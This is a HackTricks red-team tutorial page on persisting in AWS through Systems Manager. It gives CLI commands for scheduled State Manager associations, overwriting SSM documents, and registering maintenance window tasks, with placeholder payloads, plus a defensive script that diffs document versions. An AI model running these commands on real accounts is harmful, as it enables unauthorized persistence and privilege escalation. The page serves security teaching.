AWS - SSM Persistence
Tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
SSM
For more information check:
AWS - EC2, EBS, ELB, SSM, VPC & VPN Enum
Using ssm:CreateAssociation for persistence
An attacker with the ssm:CreateAssociation permission can create a State Manager Association to automatically execute commands on EC2 instances managed by SSM. These associations can be configured to run at a fixed interval, which makes them suitable for backdoor-like persistence without interactive sessions.
aws ssm create-association \
--name SSM-Document-Name \
--targets Key=InstanceIds,Values=target-instance-id \
--parameters commands=["malicious-command"] \
--schedule-expression "rate(30 minutes)" \
--association-name association-name
Note
This persistence method works as long as the EC2 instance is managed by Systems Manager, the SSM agent is running, and the attacker has permission to create associations. It does not require interactive sessions or explicit ssm:SendCommand permissions. Important: the --schedule-expression parameter (for example, rate(30 minutes)) must respect AWS's minimum interval of 30 minutes. For immediate or one-time execution, omit --schedule-expression entirely; the association will execute once after creation.
ssm:UpdateDocument, ssm:UpdateDocumentDefaultVersion, (ssm:ListDocuments | ssm:GetDocument)
An attacker with the permissions ssm:UpdateDocument and ssm:UpdateDocumentDefaultVersion can escalate privileges by modifying existing documents. This also allows persistence within that document. In practice, the attacker would also need ssm:ListDocuments to find the names of custom documents, and if the attacker wants to hide the payload inside an existing document, ssm:GetDocument will also be needed.
aws ssm list-documents
aws ssm get-document --name "target-document" --document-format YAML
# You will need to specify the version you're updating
aws ssm update-document \
--name "target-document" \
--document-format YAML \
--content "file://doc.yaml" \
--document-version 1
aws ssm update-document-default-version --name "target-document" --document-version 2
Below is an example document that can be used to overwrite an existing document. Make sure the type of your document matches the type of the target documents to avoid issues with invocation. The document below, for example, would be for the ssm:SendCommand and ssm:CreateAssociation examples.
schemaVersion: '2.2'
description: Execute commands on a Linux instance.
parameters:
  commands:
    type: StringList
    description: "The commands to run."
    displayType: textarea
mainSteps:
  - action: aws:runShellScript
    name: runCommands
    inputs:
      runCommand:
        - "id > /tmp/pwn_test.txt"
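For reviewing a document whose default version has changed, the following added example (not part of the original page) diffs the script steps of two versions and reports what the new one runs differently. It assumes both versions were retrieved in JSON document format; V1 and V2 are constructed samples, with V2 mirroring the document above.

```python
import json

# Constructed sample versions in JSON document format (not taken from a real account).
# V2 mirrors the page's example: the parameter is still declared, the step runs a literal.
V1 = json.dumps({"schemaVersion": "2.2", "parameters": {"commands": {"type": "StringList"}},
                 "mainSteps": [{"action": "aws:runShellScript", "name": "runCommands",
                                "inputs": {"runCommand": ["{{ commands }}"]}}]})
V2 = json.dumps({"schemaVersion": "2.2", "parameters": {"commands": {"type": "StringList"}},
                 "mainSteps": [{"action": "aws:runShellScript", "name": "runCommands",
                                "inputs": {"runCommand": ["id > /tmp/pwn_test.txt"]}}]})

SCRIPT_ACTIONS = ("aws:runShellScript", "aws:runPowerShellScript")

def script_lines(doc_json):
    """Map step name -> script lines for every script-running step."""
    steps = {}
    for step in json.loads(doc_json).get("mainSteps", []):
        if step.get("action") in SCRIPT_ACTIONS:
            steps[step.get("name", "?")] = list(step.get("inputs", {}).get("runCommand", []))
    return steps

def diff_versions(old_json, new_json):
    """Return (kind, step, lines) findings for what the new version runs differently."""
    old, new = script_lines(old_json), script_lines(new_json)
    findings = []
    for name, lines in new.items():
        if name not in old:
            findings.append(("new_step", name, lines))
            continue
        added = [line for line in lines if line not in old[name]]
        if added:
            findings.append(("added_lines", name, added))
        # Old step expanded a caller parameter, new one runs only literals:
        # every invocation now executes the document author's commands.
        if any("{{" in line for line in old[name]) and not any("{{" in line for line in lines):
            findings.append(("parameter_dropped", name, lines))
    return findings

if __name__ == "__main__":
    for finding in diff_versions(V1, V2):
        print(finding)
```

A "parameter_dropped" finding on a shared document deserves attention even when the added lines look harmless, because callers passing their own commands no longer control what runs.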
ssm:RegisterTaskWithMaintenanceWindow, ssm:RegisterTargetWithMaintenanceWindow, (ssm:DescribeMaintenanceWindows | ec2:DescribeInstances)
An attacker with the permissions ssm:RegisterTaskWithMaintenanceWindow and ssm:RegisterTargetWithMaintenanceWindow can escalate privileges by first registering a new target with an existing maintenance window and then updating it by registering a new task. This achieves execution on the existing targets, but it can also let the attacker affect compute with different roles by registering new targets. This also allows persistence, because maintenance window tasks run at the interval defined beforehand when the window was created. In practice, the attacker would also need ssm:DescribeMaintenanceWindows to get the maintenance window IDs.
aws ec2 describe-instances
aws ssm describe-maintenance-windows
aws ssm register-target-with-maintenance-window \
--window-id "<mw-id>" \
--resource-type "INSTANCE" \
--targets "Key=InstanceIds,Values=<instance_id>"
aws ssm register-task-with-maintenance-window \
--window-id "<mw-id>" \
--task-arn "AWS-RunShellScript" \
--task-type "RUN_COMMAND" \
--targets "Key=WindowTargetIds,Values=<target_id>" \
--task-invocation-parameters '{ "RunCommand": { "Parameters": { "commands": ["echo test > /tmp/regtaskpwn.txt"] } } }' \
--max-concurrency 50 \
--max-errors 100

